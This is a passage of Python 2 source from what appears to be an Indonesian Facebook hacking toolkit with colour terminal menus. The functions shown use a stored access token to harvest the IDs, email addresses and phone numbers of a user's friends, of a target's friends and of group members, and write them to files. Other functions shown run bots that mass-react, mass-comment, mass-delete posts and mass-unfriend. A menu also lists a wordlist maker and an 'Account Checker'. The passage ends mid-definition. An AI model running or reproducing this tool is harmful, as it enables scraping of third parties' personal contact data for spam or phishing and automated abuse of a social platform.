print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + save_id
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(save_id)
print '\x1b[1;91m[!] An error occurred'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def idfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
r = requests.get('https://graph.facebook.com/' + idt + '?fields=friends.limit(5000)&access_token=' + toket)
z = json.loads(r.text)
save_idt = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_idt, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['friends']['data']:
idfromfriends.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + save_idt
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def id_member_grup():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID grup \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + id + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
simg = raw_input('\x1b[1;91m[+] \x1b[1;97mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
b = open(simg, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
re = requests.get('https://graph.facebook.com/' + id + '/members?fields=name,id&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
idmem.append(i['id'])
b.write(i['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + i['name']
print '\x1b[1;92mID \x1b[1;91m :\x1b[1;97m ' + i['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idmem)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + simg
b.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(simg)
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def email():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
em.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(em)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(mails)
print '\x1b[1;91m[!] An error occurred'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def emailfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
emfromfriends.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(emfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def nomor_hp():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
url = 'https://graph.facebook.com/me/friends?access_token=' + toket
r = requests.get(url)
z = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for n in z['data']:
x = requests.get('https://graph.facebook.com/' + n['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hp.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Phone\x1b[1;96m%s' % len(hp)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(noms)
print '\x1b[1;91m[!] An error occurred '
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def hpfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput Friends ID \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hpfromfriends.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal number\x1b[1;96m%s' % len(hpfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Make file failed'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def menu_bot():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Bot Reactions Target Post'
print '║-> \x1b[1;37;40m2. Bot Reactions Group Post'
print '║-> \x1b[1;37;40m3. Bot Comment Target Post'
print '║-> \x1b[1;37;40m4. Bot Comment Group Post'
print '║-> \x1b[1;37;40m5. Mass Delete Post'
print '║-> \x1b[1;37;40m6. Accept Friend Requests'
print '║-> \x1b[1;37;40m7. Unfriends'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
bot_pilih()
def bot_pilih():
bots = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if bots == '':
print '\x1b[1;91m[!] Can\'t empty'
bot_pilih()
else:
if bots == '1':
menu_react()
else:
if bots == '2':
grup_react()
else:
if bots == '3':
bot_komen()
else:
if bots == '4':
grup_komen()
else:
if bots == '5':
deletepost()
else:
if bots == '6':
accept()
else:
if bots == '7':
unfriend()
else:
if bots == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + bots + ' \x1b[1;91mnot found'
bot_pilih()
def menu_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. \x1b[1;97mLike'
print '║-> \x1b[1;37;40m2. \x1b[1;97mLove'
print '║-> \x1b[1;37;40m3. \x1b[1;97mWow'
print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha'
print '║-> \x1b[1;37;40m5. \x1b[1;97mSad'
print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
react_pilih()
def react_pilih():
global tipe
aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Can\'t empty'
react_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
react()
else:
if aksi == '2':
tipe = 'LOVE'
react()
else:
if aksi == '3':
tipe = 'WOW'
react()
else:
if aksi == '4':
tipe = 'HAHA'
react()
else:
if aksi == '5':
tipe = 'SAD'
react()
else:
if aksi == '6':
tipe = 'ANGRY'
react()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found'
react_pilih()
def react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
try:
oh = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksi.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksi))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def grup_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. \x1b[1;97mLike'
print '║-> \x1b[1;37;40m2. \x1b[1;97mLove'
print '║-> \x1b[1;37;40m3. \x1b[1;97mWow'
print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha'
print '║-> \x1b[1;37;40m5. \x1b[1;97mSad'
print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
reactg_pilih()
def reactg_pilih():
global tipe
aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Can\'t empty'
reactg_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
reactg()
else:
if aksi == '2':
tipe = 'LOVE'
reactg()
else:
if aksi == '3':
tipe = 'WOW'
reactg()
else:
if aksi == '4':
tipe = 'HAHA'
reactg()
else:
if aksi == '5':
tipe = 'SAD'
reactg()
else:
if aksi == '6':
tipe = 'ANGRY'
reactg()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found'
reactg_pilih()
def reactg():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name']
try:
oh = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksigrup.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksigrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def bot_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mUse \x1b[1;97m'<>' \x1b[1;92m for newline"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
p = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komen.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komen))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def grup_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
p = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komengrup.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komengrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def deletepost():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
nam = requests.get('https://graph.facebook.com/me?access_token=' + toket)
lol = json.loads(nam.text)
nama = lol['name']
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mFrom \x1b[1;91m: \x1b[1;97m%s' % nama
jalan('\x1b[1;91m[+] \x1b[1;92mStarting remove status\x1b[1;97m ...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
asu = requests.get('https://graph.facebook.com/me/feed?access_token=' + toket)
asus = json.loads(asu.text)
for p in asus['data']:
id = p['id']
piro = 0
url = requests.get('https://graph.facebook.com/' + id + '?method=delete&access_token=' + toket)
ok = json.loads(url.text)
try:
error = ok['error']['message']
print '\x1b[1;91m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;91m] \x1b[1;95mFailed'
except TypeError:
print '\x1b[1;92m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;92m] \x1b[1;96mRemoved'
piro += 1
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Connection Error'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def accept():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
r = requests.get('https://graph.facebook.com/me/friendrequests?limit=' + limit + '&access_token=' + toket)
friends = json.loads(r.text)
if '[]' in str(friends['data']):
print '\x1b[1;91m[!] No friends request'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in friends['data']:
gas = requests.post('https://graph.facebook.com/me/friends/' + i['from']['id'] + '?access_token=' + toket)
a = json.loads(gas.text)
if 'error' in str(a):
print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;91m Failed'
print 52 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;92m Berhasil'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def unfriend():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;97mStop \x1b[1;91mCTRL+C'
print
try:
pek = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(pek.text)
for i in cok['data']:
nama = i['name']
id = i['id']
requests.delete('https://graph.facebook.com/me/friends?uid=' + id + '&access_token=' + toket)
print '\x1b[1;97m[\x1b[1;92mRemove\x1b[1;97m] ' + nama + ' => ' + id
except IndexError:
pass
except KeyboardInterrupt:
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def lain():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Write Status'
print '║-> \x1b[1;37;40m2. Make Wordlist'
print '║-> \x1b[1;37;40m3. Account Checker'
print '║-> \x1b[1;37;40m4. List Group'
print '║-> \x1b[1;37;40m5. Profile Guard'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
pilih_lain()
def pilih_lain():
